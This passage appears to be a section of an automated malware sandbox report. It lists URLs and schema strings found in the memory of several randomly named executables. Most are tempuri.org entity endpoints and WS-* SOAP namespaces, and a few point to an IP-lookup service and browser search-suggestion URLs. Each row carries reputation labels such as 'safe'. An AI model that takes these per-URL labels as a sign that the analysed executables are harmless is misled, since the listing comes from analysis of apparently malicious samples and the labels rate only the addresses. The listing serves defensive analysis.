                                          http://tempuri.org/Entity/Id4twl97yF91.exe, 00000001.00000002.323169357.0000000004D41000.00000004.00000800.00020000.00000000.sdmpfalse
                                          • URL Reputation: safe
                                          unknown
                                          http://tempuri.org/Entity/Id7twl97yF91.exe, 00000001.00000002.323169357.0000000004D41000.00000004.00000800.00020000.00000000.sdmp, uPD30tM82.exe, 0000000E.00000002.435203327.0000000002641000.00000004.00000800.00020000.00000000.sdmpfalse
                                          • URL Reputation: safe
                                          unknown
                                          http://tempuri.org/Entity/Id6twl97yF91.exe, 00000001.00000002.323169357.0000000004D41000.00000004.00000800.00020000.00000000.sdmp, uPD30tM82.exe, 0000000E.00000002.435203327.0000000002641000.00000004.00000800.00020000.00000000.sdmpfalse
                                          • URL Reputation: safe
                                          unknown
                                          http://schemas.xmlsoap.org/ws/2005/02/trust#BinarySecrettwl97yF91.exe, 00000001.00000002.323169357.0000000004DEE000.00000004.00000800.00020000.00000000.sdmp, uPD30tM82.exe, 0000000E.00000002.435203327.00000000026CF000.00000004.00000800.00020000.00000000.sdmpfalse
                                            high
                                            http://tempuri.org/Entity/Id19Responsetwl97yF91.exe, 00000001.00000002.323169357.0000000004DEE000.00000004.00000800.00020000.00000000.sdmp, twl97yF91.exe, 00000001.00000002.323169357.0000000004D41000.00000004.00000800.00020000.00000000.sdmp, uPD30tM82.exe, 0000000E.00000002.435203327.0000000002641000.00000004.00000800.00020000.00000000.sdmp, uPD30tM82.exe, 0000000E.00000002.435203327.000000000290E000.00000004.00000800.00020000.00000000.sdmpfalse
                                            • URL Reputation: safe
                                            unknown
                                            http://docs.oasis-open.org/wss/oasis-wss-rel-token-profile-1.0.pdf#licensetwl97yF91.exe, 00000001.00000002.323169357.0000000004DEE000.00000004.00000800.00020000.00000000.sdmp, uPD30tM82.exe, 0000000E.00000002.435203327.00000000026CF000.00000004.00000800.00020000.00000000.sdmpfalse
                                              high
                                              http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/Issuetwl97yF91.exe, 00000001.00000002.323169357.0000000004DEE000.00000004.00000800.00020000.00000000.sdmp, uPD30tM82.exe, 0000000E.00000002.435203327.00000000026CF000.00000004.00000800.00020000.00000000.sdmpfalse
                                                high
                                                http://schemas.xmlsoap.org/ws/2004/10/wsat/Abortedtwl97yF91.exe, 00000001.00000002.323169357.0000000004DEE000.00000004.00000800.00020000.00000000.sdmp, uPD30tM82.exe, 0000000E.00000002.435203327.00000000026CF000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  high
                                                  http://schemas.xmlsoap.org/ws/2005/02/rm/TerminateSequencetwl97yF91.exe, 00000001.00000002.323169357.0000000004D41000.00000004.00000800.00020000.00000000.sdmp, uPD30tM82.exe, 0000000E.00000002.435203327.0000000002641000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    high
                                                    http://schemas.xmlsoap.org/ws/2004/10/wsat/faulttwl97yF91.exe, 00000001.00000002.323169357.0000000004DEE000.00000004.00000800.00020000.00000000.sdmp, uPD30tM82.exe, 0000000E.00000002.435203327.00000000026CF000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      high
                                                      http://schemas.xmlsoap.org/ws/2004/10/wsattwl97yF91.exe, 00000001.00000002.323169357.0000000004DEE000.00000004.00000800.00020000.00000000.sdmp, uPD30tM82.exe, 0000000E.00000002.435203327.00000000026CF000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        high
                                                        http://docs.oasis-open.org/wss/oasis-wss-soap-message-security-1.1#EncryptedKeytwl97yF91.exe, 00000001.00000002.323169357.0000000004DEE000.00000004.00000800.00020000.00000000.sdmp, uPD30tM82.exe, 0000000E.00000002.435203327.00000000026CF000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          high
                                                          http://tempuri.org/Entity/Id15Responsetwl97yF91.exe, 00000001.00000002.323169357.0000000004DEE000.00000004.00000800.00020000.00000000.sdmp, twl97yF91.exe, 00000001.00000002.323169357.0000000004D41000.00000004.00000800.00020000.00000000.sdmp, uPD30tM82.exe, 0000000E.00000002.435203327.0000000002641000.00000004.00000800.00020000.00000000.sdmp, uPD30tM82.exe, 0000000E.00000002.435203327.0000000002A27000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          • URL Reputation: safe
                                                          unknown
                                                          http://tempuri.org/Entity/Id14VuPD30tM82.exe, 0000000E.00000002.435203327.000000000290E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          • URL Reputation: safe
                                                          unknown
                                                          http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nametwl97yF91.exe, 00000001.00000002.323169357.0000000004DEE000.00000004.00000800.00020000.00000000.sdmp, uPD30tM82.exe, 0000000E.00000002.435203327.00000000026CF000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            high
                                                            http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT/Renewtwl97yF91.exe, 00000001.00000002.323169357.0000000004DEE000.00000004.00000800.00020000.00000000.sdmp, uPD30tM82.exe, 0000000E.00000002.435203327.00000000026CF000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              high
                                                              http://schemas.xmlsoap.org/ws/2004/10/wscoor/Registertwl97yF91.exe, 00000001.00000002.323169357.0000000004DEE000.00000004.00000800.00020000.00000000.sdmp, uPD30tM82.exe, 0000000E.00000002.435203327.00000000026CF000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                high
                                                                http://tempuri.org/Entity/Id6Responsetwl97yF91.exe, 00000001.00000002.323169357.0000000004DEE000.00000004.00000800.00020000.00000000.sdmp, twl97yF91.exe, 00000001.00000002.323169357.0000000004D41000.00000004.00000800.00020000.00000000.sdmp, uPD30tM82.exe, 0000000E.00000002.435203327.0000000002641000.00000004.00000800.00020000.00000000.sdmp, uPD30tM82.exe, 0000000E.00000002.435203327.000000000290E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                • URL Reputation: safe
                                                                unknown
                                                                http://schemas.xmlsoap.org/ws/2004/04/trust/SymmetricKeytwl97yF91.exe, 00000001.00000002.323169357.0000000004DEE000.00000004.00000800.00020000.00000000.sdmp, uPD30tM82.exe, 0000000E.00000002.435203327.00000000026CF000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  high
                                                                  https://api.ip.sb/ipW7ANVukbbj.exe, 00000000.00000003.254929355.0000000004A26000.00000004.00000020.00020000.00000000.sdmp, twl97yF91.exe, 00000001.00000002.323169357.0000000004DEE000.00000004.00000800.00020000.00000000.sdmp, twl97yF91.exe, 00000001.00000002.322917583.0000000004B10000.00000004.08000000.00040000.00000000.sdmp, twl97yF91.exe, 00000001.00000002.322488235.0000000002F56000.00000004.00000020.00020000.00000000.sdmp, twl97yF91.exe, 00000001.00000002.333480133.00000000076C0000.00000004.08000000.00040000.00000000.sdmp, uPD30tM82.exe, 0000000E.00000002.435203327.00000000026CF000.00000004.00000800.00020000.00000000.sdmp, uPD30tM82.exe, 0000000E.00000000.337013680.00000000002B2000.00000002.00000001.01000000.00000008.sdmp, uPD30tM82.exe.0.drfalse
                                                                  • URL Reputation: safe
                                                                  unknown
                                                                  http://schemas.xmlsoap.org/ws/2004/04/sctwl97yF91.exe, 00000001.00000002.323169357.0000000004DEE000.00000004.00000800.00020000.00000000.sdmp, uPD30tM82.exe, 0000000E.00000002.435203327.00000000026CF000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    high
                                                                    http://schemas.xmlsoap.org/ws/2004/10/wsat/Volatile2PCtwl97yF91.exe, 00000001.00000002.323169357.0000000004DEE000.00000004.00000800.00020000.00000000.sdmp, uPD30tM82.exe, 0000000E.00000002.435203327.00000000026CF000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      high
                                                                      http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT/Canceltwl97yF91.exe, 00000001.00000002.323169357.0000000004DEE000.00000004.00000800.00020000.00000000.sdmp, uPD30tM82.exe, 0000000E.00000002.435203327.00000000026CF000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        high
                                                                        http://tempuri.org/Entity/Id9Responsetwl97yF91.exe, 00000001.00000002.323169357.0000000004DEE000.00000004.00000800.00020000.00000000.sdmp, twl97yF91.exe, 00000001.00000002.323169357.0000000004D41000.00000004.00000800.00020000.00000000.sdmp, uPD30tM82.exe, 0000000E.00000002.435203327.0000000002641000.00000004.00000800.00020000.00000000.sdmp, uPD30tM82.exe, 0000000E.00000002.435203327.000000000290E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        • URL Reputation: safe
                                                                        unknown
                                                                        https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=uPD30tM82.exe, 0000000E.00000002.440661066.00000000036BC000.00000004.00000800.00020000.00000000.sdmp, uPD30tM82.exe, 0000000E.00000002.440661066.000000000371D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          high
                                                                          http://tempuri.org/Entity/Id20twl97yF91.exe, 00000001.00000002.323169357.0000000004DEE000.00000004.00000800.00020000.00000000.sdmp, twl97yF91.exe, 00000001.00000002.323169357.0000000004D41000.00000004.00000800.00020000.00000000.sdmp, uPD30tM82.exe, 0000000E.00000002.435203327.0000000002641000.00000004.00000800.00020000.00000000.sdmp, uPD30tM82.exe, 0000000E.00000002.435203327.000000000290E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          • URL Reputation: safe
                                                                          unknown
                                                                          http://tempuri.org/Entity/Id21twl97yF91.exe, 00000001.00000002.323169357.0000000004D41000.00000004.00000800.00020000.00000000.sdmp, uPD30tM82.exe, 0000000E.00000002.435203327.0000000002641000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          • URL Reputation: safe
                                                                          unknown
                                                                          http://tempuri.org/Entity/Id22twl97yF91.exe, 00000001.00000002.323169357.0000000004DEE000.00000004.00000800.00020000.00000000.sdmp, twl97yF91.exe, 00000001.00000002.323169357.0000000004D41000.00000004.00000800.00020000.00000000.sdmp, uPD30tM82.exe, 0000000E.00000002.435203327.0000000002641000.00000004.00000800.00020000.00000000.sdmp, uPD30tM82.exe, 0000000E.00000002.435203327.00000000026CF000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          • URL Reputation: safe
                                                                          unknown
                                                                          http://docs.oasis-open.org/wss/oasis-wss-kerberos-token-profile-1.1#Kerberosv5APREQSHA1twl97yF91.exe, 00000001.00000002.323169357.0000000004DEE000.00000004.00000800.00020000.00000000.sdmp, uPD30tM82.exe, 0000000E.00000002.435203327.00000000026CF000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            high
                                                                            http://schemas.xmlsoap.org/ws/2004/04/security/trust/CK/PSHA1twl97yF91.exe, 00000001.00000002.323169357.0000000004DEE000.00000004.00000800.00020000.00000000.sdmp, uPD30tM82.exe, 0000000E.00000002.435203327.00000000026CF000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              high
                                                                              http://schemas.xmlsoap.org/ws/2004/04/security/trust/RSTR/Issuetwl97yF91.exe, 00000001.00000002.323169357.0000000004DEE000.00000004.00000800.00020000.00000000.sdmp, uPD30tM82.exe, 0000000E.00000002.435203327.00000000026CF000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                high
                                                                                http://tempuri.org/Entity/Id1Responsetwl97yF91.exe, 00000001.00000002.323169357.0000000004DEE000.00000004.00000800.00020000.00000000.sdmp, twl97yF91.exe, 00000001.00000002.323169357.0000000004D41000.00000004.00000800.00020000.00000000.sdmp, uPD30tM82.exe, 0000000E.00000002.435203327.0000000002641000.00000004.00000800.00020000.00000000.sdmp, uPD30tM82.exe, 0000000E.00000002.435203327.00000000026CF000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                • URL Reputation: safe
                                                                                unknown
                                                                                https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas_sfp&command=twl97yF91.exe, 00000001.00000002.326658615.0000000005FBA000.00000004.00000800.00020000.00000000.sdmp, twl97yF91.exe, 00000001.00000002.323169357.0000000004EC5000.00000004.00000800.00020000.00000000.sdmp, twl97yF91.exe, 00000001.00000002.326658615.0000000005E41000.00000004.00000800.00020000.00000000.sdmp, twl97yF91.exe, 00000001.00000002.326658615.0000000005EA2000.00000004.00000800.00020000.00000000.sdmp, twl97yF91.exe, 00000001.00000002.326658615.0000000006060000.00000004.00000800.00020000.00000000.sdmp, twl97yF91.exe, 00000001.00000002.326658615.0000000005DE1000.00000004.00000800.00020000.00000000.sdmp, twl97yF91.exe, 00000001.00000002.326658615.0000000005F1F000.00000004.00000800.00020000.00000000.sdmp, twl97yF91.exe, 00000001.00000002.326658615.0000000005F9D000.00000004.00000800.00020000.00000000.sdmp, twl97yF91.exe, 00000001.00000002.326658615.000000000601B000.00000004.00000800.00020000.00000000.sdmp, twl97yF91.exe, 00000001.00000002.323169357.000000000506B000.00000004.00000800.00020000.00000000.sdmp, twl97yF91.exe, 00000001.00000002.323169357.0000000004FDE000.00000004.00000800.00020000.00000000.sdmp, twl97yF91.exe, 00000001.00000002.323169357.0000000004F52000.00000004.00000800.00020000.00000000.sdmp, twl97yF91.exe, 00000001.00000002.326658615.0000000005EBF000.00000004.00000800.00020000.00000000.sdmp, twl97yF91.exe, 00000001.00000002.326658615.0000000005F3C000.00000004.00000800.00020000.00000000.sdmp, twl97yF91.exe, 00000001.00000002.323169357.00000000050F8000.00000004.00000800.00020000.00000000.sdmp, twl97yF91.exe, 00000001.00000002.326658615.0000000005DA0000.00000004.00000800.00020000.00000000.sdmp, twl97yF91.exe, 00000001.00000002.326658615.0000000006038000.00000004.00000800.00020000.00000000.sdmp, uPD30tM82.exe, 0000000E.00000002.440661066.0000000003819000.00000004.00000800.00020000.00000000.sdmp, uPD30tM82.exe, 0000000E.00000002.440661066.000000000373A000.00000004.00000800.00020000.00000000.sdmp, uPD30tM82.exe, 0000000E.00000002.440661066.0000000003911000.00000004.00000800.00020000.00000000.sdmp, uPD30tM82.exe, 0000000E.00000002.435203327.000000000275B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                  high
                                                                                  http://schemas.xmlsoap.org/ws/2005/02/rm/AckRequestedtwl97yF91.exe, 00000001.00000002.323169357.0000000004D41000.00000004.00000800.00020000.00000000.sdmp, uPD30tM82.exe, 0000000E.00000002.435203327.0000000002641000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                    high
                                                                                    http://schemas.xmlsoap.org/ws/2004/10/wsat/ReadOnlytwl97yF91.exe, 00000001.00000002.323169357.0000000004DEE000.00000004.00000800.00020000.00000000.sdmp, uPD30tM82.exe, 0000000E.00000002.435203327.00000000026CF000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                      high
                                                                                      http://schemas.xmlsoap.org/ws/2004/10/wsat/Replaytwl97yF91.exe, 00000001.00000002.323169357.0000000004DEE000.00000004.00000800.00020000.00000000.sdmp, uPD30tM82.exe, 0000000E.00000002.435203327.00000000026CF000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                        high
                                                                                        http://schemas.xmlsoap.org/ws/2005/02/trust/tlsnegotwl97yF91.exe, 00000001.00000002.323169357.0000000004DEE000.00000004.00000800.00020000.00000000.sdmp, uPD30tM82.exe, 0000000E.00000002.435203327.00000000026CF000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                          high
                                                                                          http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#Base64Binarytwl97yF91.exe, 00000001.00000002.323169357.0000000004DEE000.00000004.00000800.00020000.00000000.sdmp, uPD30tM82.exe, 0000000E.00000002.435203327.00000000026CF000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                            high
                                                                                            http://schemas.xmlsoap.org/ws/2004/10/wsat/Durable2PCtwl97yF91.exe, 00000001.00000002.323169357.0000000004DEE000.00000004.00000800.00020000.00000000.sdmp, uPD30tM82.exe, 0000000E.00000002.435203327.00000000026CF000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                              high
                                                                                              http://schemas.xmlsoap.org/ws/2004/04/security/trust/SymmetricKeytwl97yF91.exe, 00000001.00000002.323169357.0000000004DEE000.00000004.00000800.00020000.00000000.sdmp, uPD30tM82.exe, 0000000E.00000002.435203327.00000000026CF000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                high
                                                                                                http://schemas.xmlsoap.org/ws/2004/08/addressingtwl97yF91.exe, 00000001.00000002.323169357.0000000004D41000.00000004.00000800.00020000.00000000.sdmp, uPD30tM82.exe, 0000000E.00000002.435203327.0000000002641000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                  high
                                                                                                  http://schemas.xmlsoap.org/ws/2005/02/trust/RST/Issuetwl97yF91.exe, 00000001.00000002.323169357.0000000004DEE000.00000004.00000800.00020000.00000000.sdmp, uPD30tM82.exe, 0000000E.00000002.435203327.00000000026CF000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                    high
                                                                                                    http://schemas.xmlsoap.org/ws/2004/10/wsat/Completiontwl97yF91.exe, 00000001.00000002.323169357.0000000004DEE000.00000004.00000800.00020000.00000000.sdmp, uPD30tM82.exe, 0000000E.00000002.435203327.00000000026CF000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                      high
                                                                                                      http://schemas.xmlsoap.org/ws/2004/04/trusttwl97yF91.exe, 00000001.00000002.323169357.0000000004DEE000.00000004.00000800.00020000.00000000.sdmp, uPD30tM82.exe, 0000000E.00000002.435203327.00000000026CF000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                        high
                                                                                                        http://tempuri.org/Entity/Id10twl97yF91.exe, 00000001.00000002.323169357.0000000004DEE000.00000004.00000800.00020000.00000000.sdmp, twl97yF91.exe, 00000001.00000002.323169357.0000000004D41000.00000004.00000800.00020000.00000000.sdmp, uPD30tM82.exe, 0000000E.00000002.435203327.0000000002641000.00000004.00000800.00020000.00000000.sdmp, uPD30tM82.exe, 0000000E.00000002.435203327.00000000026CF000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                        • URL Reputation: safe
                                                                                                        unknown
                                                                                                        http://tempuri.org/Entity/Id11twl97yF91.exe, 00000001.00000002.323169357.0000000004D41000.00000004.00000800.00020000.00000000.sdmp, uPD30tM82.exe, 0000000E.00000002.435203327.0000000002641000.00000004.00000800.00020000.00000000.sdmp, uPD30tM82.exe, 0000000E.00000002.435203327.000000000290E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                        • URL Reputation: safe
                                                                                                        unknown
                                                                                                        http://tempuri.org/Entity/Id12twl97yF91.exe, 00000001.00000002.323169357.0000000004D41000.00000004.00000800.00020000.00000000.sdmp, uPD30tM82.exe, 0000000E.00000002.435203327.0000000002641000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                        • URL Reputation: safe
                                                                                                        unknown
                                                                                                        http://tempuri.org/Entity/Id16Responsetwl97yF91.exe, 00000001.00000002.323169357.0000000004DEE000.00000004.00000800.00020000.00000000.sdmp, twl97yF91.exe, 00000001.00000002.323169357.0000000004D41000.00000004.00000800.00020000.00000000.sdmp, uPD30tM82.exe, 0000000E.00000002.435203327.0000000002641000.00000004.00000800.00020000.00000000.sdmp, uPD30tM82.exe, 0000000E.00000002.435203327.00000000026CF000.00000004.00000800.00020000.00000000.sdmp, uPD30tM82.exe, 0000000E.00000002.435203327.0000000002A27000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                        • URL Reputation: safe
                                                                                                        unknown
                                                                                                        http://schemas.xmlsoap.org/ws/2004/10/wscoor/CreateCoordinationContextResponsetwl97yF91.exe, 00000001.00000002.323169357.0000000004DEE000.00000004.00000800.00020000.00000000.sdmp, uPD30tM82.exe, 0000000E.00000002.435203327.00000000026CF000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                          high
                                                                                                          http://schemas.xmlsoap.org/ws/2005/02/trust/RST/SCT/Canceltwl97yF91.exe, 00000001.00000002.323169357.0000000004DEE000.00000004.00000800.00020000.00000000.sdmp, uPD30tM82.exe, 0000000E.00000002.435203327.00000000026CF000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                            high
                                                                                                            http://tempuri.org/Entity/Id13twl97yF91.exe, 00000001.00000002.323169357.0000000004D41000.00000004.00000800.00020000.00000000.sdmp, uPD30tM82.exe, 0000000E.00000002.435203327.0000000002641000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                            • URL Reputation: safe
                                                                                                            unknown
                                                                                                            http://tempuri.org/Entity/Id14twl97yF91.exe, 00000001.00000002.323169357.0000000004D41000.00000004.00000800.00020000.00000000.sdmp, uPD30tM82.exe, 0000000E.00000002.435203327.0000000002641000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                            • URL Reputation: safe
                                                                                                            unknown
                                                                                                            http://tempuri.org/Entity/Id15twl97yF91.exe, 00000001.00000002.323169357.0000000004D41000.00000004.00000800.00020000.00000000.sdmp, uPD30tM82.exe, 0000000E.00000002.435203327.0000000002641000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                            • URL Reputation: safe
                                                                                                            unknown
                                                                                                            http://tempuri.org/Entity/Id16twl97yF91.exe, 00000001.00000002.323169357.0000000004D41000.00000004.00000800.00020000.00000000.sdmp, uPD30tM82.exe, 0000000E.00000002.435203327.0000000002641000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                            • URL Reputation: safe
                                                                                                            unknown
                                                                                                            http://schemas.xmlsoap.org/ws/2005/02/trust/Noncetwl97yF91.exe, 00000001.00000002.323169357.0000000004DEE000.00000004.00000800.00020000.00000000.sdmp, uPD30tM82.exe, 0000000E.00000002.435203327.00000000026CF000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                              high
                                                                                                              http://tempuri.org/Entity/Id17twl97yF91.exe, 00000001.00000002.323169357.0000000004D41000.00000004.00000800.00020000.00000000.sdmp, uPD30tM82.exe, 0000000E.00000002.435203327.0000000002641000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                              • URL Reputation: safe
                                                                                                              unknown
                                                                                                              http://tempuri.org/Entity/Id18twl97yF91.exe, 00000001.00000002.323169357.0000000004D41000.00000004.00000800.00020000.00000000.sdmp, uPD30tM82.exe, 0000000E.00000002.435203327.0000000002641000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                              • URL Reputation: safe
                                                                                                              unknown
                                                                                                              http://tempuri.org/Entity/Id5Responsetwl97yF91.exe, 00000001.00000002.323169357.0000000004D41000.00000004.00000800.00020000.00000000.sdmp, uPD30tM82.exe, 0000000E.00000002.435203327.0000000002641000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                              • URL Reputation: safe
                                                                                                              unknown
                                                                                                              http://tempuri.org/Entity/Id19twl97yF91.exe, 00000001.00000002.323169357.0000000004D41000.00000004.00000800.00020000.00000000.sdmp, uPD30tM82.exe, 0000000E.00000002.435203327.0000000002641000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                              • URL Reputation: safe
                                                                                                              unknown
                                                                                                              http://schemas.xmlsoap.org/ws/2005/05/identity/claims/dnstwl97yF91.exe, 00000001.00000002.323169357.0000000004D41000.00000004.00000800.00020000.00000000.sdmp, uPD30tM82.exe, 0000000E.00000002.435203327.0000000002641000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                high
                                                                                                                http://tempuri.org/Entity/Id10Responsetwl97yF91.exe, 00000001.00000002.323169357.0000000005105000.00000004.00000800.00020000.00000000.sdmp, twl97yF91.exe, 00000001.00000002.323169357.0000000005199000.00000004.00000800.00020000.00000000.sdmp, twl97yF91.exe, 00000001.00000002.323169357.0000000004D41000.00000004.00000800.00020000.00000000.sdmp, uPD30tM82.exe, 0000000E.00000002.435203327.0000000002641000.00000004.00000800.00020000.00000000.sdmp, uPD30tM82.exe, 0000000E.00000002.435203327.0000000002A27000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                • URL Reputation: safe
                                                                                                                unknown
                                                                                                                http://schemas.xmlsoap.org/ws/2005/02/trust/Renewtwl97yF91.exe, 00000001.00000002.323169357.0000000004DEE000.00000004.00000800.00020000.00000000.sdmp, uPD30tM82.exe, 0000000E.00000002.435203327.00000000026CF000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                  high
                                                                                                                  http://schemas.xmlsoap.org/ws/2005/02/rm8Dtwl97yF91.exe, 00000001.00000002.323169357.0000000004D41000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                    high
                                                                                                                    http://tempuri.org/Entity/Id8Responsetwl97yF91.exe, 00000001.00000002.323169357.0000000004DEE000.00000004.00000800.00020000.00000000.sdmp, twl97yF91.exe, 00000001.00000002.323169357.0000000004D41000.00000004.00000800.00020000.00000000.sdmp, uPD30tM82.exe, 0000000E.00000002.435203327.0000000002641000.00000004.00000800.00020000.00000000.sdmp, uPD30tM82.exe, 0000000E.00000002.435203327.000000000290E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                    • URL Reputation: safe
                                                                                                                    unknown
                                                                                                                    http://schemas.xmlsoap.org/ws/2004/04/trust/PublicKeytwl97yF91.exe, 00000001.00000002.323169357.0000000004DEE000.00000004.00000800.00020000.00000000.sdmp, uPD30tM82.exe, 0000000E.00000002.435203327.00000000026CF000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                      high
                                                                                                                      http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.1#SAMLV2.0twl97yF91.exe, 00000001.00000002.323169357.0000000004DEE000.00000004.00000800.00020000.00000000.sdmp, uPD30tM82.exe, 0000000E.00000002.435203327.00000000026CF000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                        high
                                                                                                                        http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.0#SAMLAssertionIDtwl97yF91.exe, 00000001.00000002.323169357.0000000004DEE000.00000004.00000800.00020000.00000000.sdmp, uPD30tM82.exe, 0000000E.00000002.435203327.00000000026CF000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                          high
                                                                                                                          http://schemas.xmlsoap.org/ws/2004/04/security/trust/RST/SCTtwl97yF91.exe, 00000001.00000002.323169357.0000000004DEE000.00000004.00000800.00020000.00000000.sdmp, uPD30tM82.exe, 0000000E.00000002.435203327.00000000026CF000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                            high
                                                                                                                            http://schemas.xmlsoap.org/ws/2006/02/addressingidentitytwl97yF91.exe, 00000001.00000002.323169357.0000000004DEE000.00000004.00000800.00020000.00000000.sdmp, uPD30tM82.exe, 0000000E.00000002.435203327.00000000026CF000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                              high
                                                                                                                              http://schemas.xmlsoap.org/soap/envelope/twl97yF91.exe, 00000001.00000002.323169357.0000000004D41000.00000004.00000800.00020000.00000000.sdmp, uPD30tM82.exe, 0000000E.00000002.435203327.0000000002641000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                high
                                                                                                                                http://tempuri.org/Entity/Id40uPD30tM82.exe, 0000000E.00000002.435203327.0000000002641000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                • URL Reputation: safe
                                                                                                                                unknown
                                                                                                                                https://search.yahoo.com?fr=crmas_sfpftwl97yF91.exe, 00000001.00000002.326658615.0000000005FBA000.00000004.00000800.00020000.00000000.sdmp, twl97yF91.exe, 00000001.00000002.323169357.0000000004EC5000.00000004.00000800.00020000.00000000.sdmp, twl97yF91.exe, 00000001.00000002.326658615.0000000005E41000.00000004.00000800.00020000.00000000.sdmp, twl97yF91.exe, 00000001.00000002.326658615.0000000005EA2000.00000004.00000800.00020000.00000000.sdmp, twl97yF91.exe, 00000001.00000002.326658615.0000000006060000.00000004.00000800.00020000.00000000.sdmp, twl97yF91.exe, 00000001.00000002.326658615.0000000005DE1000.00000004.00000800.00020000.00000000.sdmp, twl97yF91.exe, 00000001.00000002.326658615.0000000005F1F000.00000004.00000800.00020000.00000000.sdmp, twl97yF91.exe, 00000001.00000002.326658615.0000000005F9D000.00000004.00000800.00020000.00000000.sdmp, twl97yF91.exe, 00000001.00000002.326658615.000000000601B000.00000004.00000800.00020000.00000000.sdmp, twl97yF91.exe, 00000001.00000002.323169357.000000000506B000.00000004.00000800.00020000.00000000.sdmp, twl97yF91.exe, 00000001.00000002.323169357.0000000004FDE000.00000004.00000800.00020000.00000000.sdmp, twl97yF91.exe, 00000001.00000002.323169357.0000000004F52000.00000004.00000800.00020000.00000000.sdmp, twl97yF91.exe, 00000001.00000002.326658615.0000000005EBF000.00000004.00000800.00020000.00000000.sdmp, twl97yF91.exe, 00000001.00000002.326658615.0000000005F3C000.00000004.00000800.00020000.00000000.sdmp, twl97yF91.exe, 00000001.00000002.323169357.00000000050F8000.00000004.00000800.00020000.00000000.sdmp, twl97yF91.exe, 00000001.00000002.326658615.0000000005DA0000.00000004.00000800.00020000.00000000.sdmp, twl97yF91.exe, 00000001.00000002.326658615.0000000006038000.00000004.00000800.00020000.00000000.sdmp, uPD30tM82.exe, 0000000E.00000002.440661066.0000000003819000.00000004.00000800.00020000.00000000.sdmp, uPD30tM82.exe, 0000000E.00000002.440661066.000000000373A000.00000004.00000800.00020000.00000000.sdmp, uPD30tM82.exe, 0000000E.00000002.440661066.0000000003911000.00000004.00000800.00020000.00000000.sdmp, uPD30tM82.exe, 0000000E.00000002.435203327.000000000275B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                  high
                                                                                                                                  http://schemas.xmlsoap.org/ws/2005/02/trust/PublicKeytwl97yF91.exe, 00000001.00000002.323169357.0000000004DEE000.00000004.00000800.00020000.00000000.sdmp, uPD30tM82.exe, 0000000E.00000002.435203327.00000000026CF000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                    high
